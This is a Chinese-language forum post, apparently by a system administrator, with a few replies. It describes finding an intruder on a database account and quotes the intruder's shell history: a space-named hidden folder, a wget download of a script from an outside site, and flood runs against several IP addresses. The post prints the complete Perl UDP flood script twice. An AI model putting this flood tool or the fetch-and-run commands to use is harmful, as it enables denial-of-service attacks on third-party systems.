×

Loading...
Ad by
  • 最优利率和cashback可以申请特批,好信用好收入offer更好。请点链接扫码加微信咨询,Scotiabank -- Nick Zhang 6478812600。
Ad by
  • 最优利率和cashback可以申请特批,好信用好收入offer更好。请点链接扫码加微信咨询,Scotiabank -- Nick Zhang 6478812600。

一位黑客在偶机器上留下的行踪

本文发表在 rolia.net 枫下论坛今天忽然发现网站连接数爆多,但仔细一看真正的用户没几个。
幸好偶的监视程序每天都把异常用户登陆结果发到油箱,仔细一看,发现有不明ip登陆进了数据库用户ID oracle

呵呵,看看这个Oracle在干啥

root:/root > cd /home/oracle
root:/home/oracle > tail -100 .sh_history
.....
.....
ls -all
mkdir " "
cd " "
wget http://www.trades.uv.ro/flood/udp.pl
perl udp.pl 12.12.12.12 0 0
perl udp.pl 201.252.114.170 0 0
perl udp.pl 67.70.24.165 0 0
passwd
uname -a
perl udp.pl 81.89.10.92 0 0

呵呵,看来这黑客还不是一般的菜鸟,居然还知道用‘隐藏‘文件夹形式

root:/home/oracle >cd " "
root:/home/oracle/ > ls -ltr
total 3
-rw-r--r-- 1 oracle dba 1148 Nov 25 08:06 udp.pl

root:/home/oracle/ > more udp.pl
#!/usr/bin/perl
#####################################################
# udp flood.
#
# gr33ts: meth, etech, skrilla, datawar, fr3aky, etc.
#
# --/odix
######################################################

use Socket;

$ARGC=@ARGV;

if ($ARGC !=3) {
printf "$0 <ip> <port> <time>\n";
printf "if arg1/2 =0, randports/continous packets.\n";
exit(1);
}

my ($ip,$port,$size,$time);
$ip=$ARGV[0];
$port=$ARGV[1];
$time=$ARGV[2];

socket(crazy, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$ip");

printf "udp flood - odix\n";

if ($ARGV[1] ==0 && $ARGV[2] ==0) {
goto randpackets;
}
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto packets;
}
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
goto packets;
}
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto randpackets;
}

packets:
for (;;) {
$size=$rand x $rand x $rand;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

randpackets:
for (;;) {
$size=$rand x $rand x $rand;
$port=int(rand 65000) +1;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}


呵呵,写个死循环for(;;),有没有搞错阿

我要不要对它的ip攻击一下呢?...算了,把oracle密码改了算了

root:/home/oracle/ > last oracle
oracle pts/1 aca12e9e.ipt.aol.com Dec 02 14:23 - 20:35 (06:11)

aol.com的用户,美国的?

这年头, 系统管理员的乐趣不少阿,哎!更多精彩文章及讨论,请光临枫下论坛 rolia.net
Report

Replies, comments and Discussions:

  • 工作学习 / 专业技术讨论 / 一位黑客在偶机器上留下的行踪
    本文发表在 rolia.net 枫下论坛今天忽然发现网站连接数爆多,但仔细一看真正的用户没几个。
    幸好偶的监视程序每天都把异常用户登陆结果发到油箱,仔细一看,发现有不明ip登陆进了数据库用户ID oracle

    呵呵,看看这个Oracle在干啥

    root:/root > cd /home/oracle
    root:/home/oracle > tail -100 .sh_history
    .....
    .....
    ls -all
    mkdir " "
    cd " "
    wget http://www.trades.uv.ro/flood/udp.pl
    perl udp.pl 12.12.12.12 0 0
    perl udp.pl 201.252.114.170 0 0
    perl udp.pl 67.70.24.165 0 0
    passwd
    uname -a
    perl udp.pl 81.89.10.92 0 0

    呵呵,看来这黑客还不是一般的菜鸟,居然还知道用‘隐藏‘文件夹形式

    root:/home/oracle >cd " "
    root:/home/oracle/ > ls -ltr
    total 3
    -rw-r--r-- 1 oracle dba 1148 Nov 25 08:06 udp.pl

    root:/home/oracle/ > more udp.pl
    #!/usr/bin/perl
    #####################################################
    # udp flood.
    #
    # gr33ts: meth, etech, skrilla, datawar, fr3aky, etc.
    #
    # --/odix
    ######################################################

    use Socket;

    $ARGC=@ARGV;

    if ($ARGC !=3) {
    printf "$0 <ip> <port> <time>\n";
    printf "if arg1/2 =0, randports/continous packets.\n";
    exit(1);
    }

    my ($ip,$port,$size,$time);
    $ip=$ARGV[0];
    $port=$ARGV[1];
    $time=$ARGV[2];

    socket(crazy, PF_INET, SOCK_DGRAM, 17);
    $iaddr = inet_aton("$ip");

    printf "udp flood - odix\n";

    if ($ARGV[1] ==0 && $ARGV[2] ==0) {
    goto randpackets;
    }
    if ($ARGV[1] !=0 && $ARGV[2] !=0) {
    system("(sleep $time;killall -9 udp) &");
    goto packets;
    }
    if ($ARGV[1] !=0 && $ARGV[2] ==0) {
    goto packets;
    }
    if ($ARGV[1] ==0 && $ARGV[2] !=0) {
    system("(sleep $time;killall -9 udp) &");
    goto randpackets;
    }

    packets:
    for (;;) {
    $size=$rand x $rand x $rand;
    send(crazy, 0, $size, sockaddr_in($port, $iaddr));
    }

    randpackets:
    for (;;) {
    $size=$rand x $rand x $rand;
    $port=int(rand 65000) +1;
    send(crazy, 0, $size, sockaddr_in($port, $iaddr));
    }


    呵呵,写个死循环for(;;),有没有搞错阿

    我要不要对它的ip攻击一下呢?...算了,把oracle密码改了算了

    root:/home/oracle/ > last oracle
    oracle pts/1 aca12e9e.ipt.aol.com Dec 02 14:23 - 20:35 (06:11)

    aol.com的用户,美国的?

    这年头, 系统管理员的乐趣不少阿,哎!更多精彩文章及讨论,请光临枫下论坛 rolia.net
    • 挨踢人真了不起,那么boring的东西玩得津津有味。
    • 对公网开放telnet的后果,呵呵 // 那个aol.com没准也是肉鸡
    • 找的就是你这种肉鸡。N年前国内绿色兵团的人早给偶演示过了。
    • 呵呵,机器升级完毕. 大内存就是爽阿.. root:/root > lsattr -El mem0 goodsize 8448 Amount of usable physical memory in Mbytes False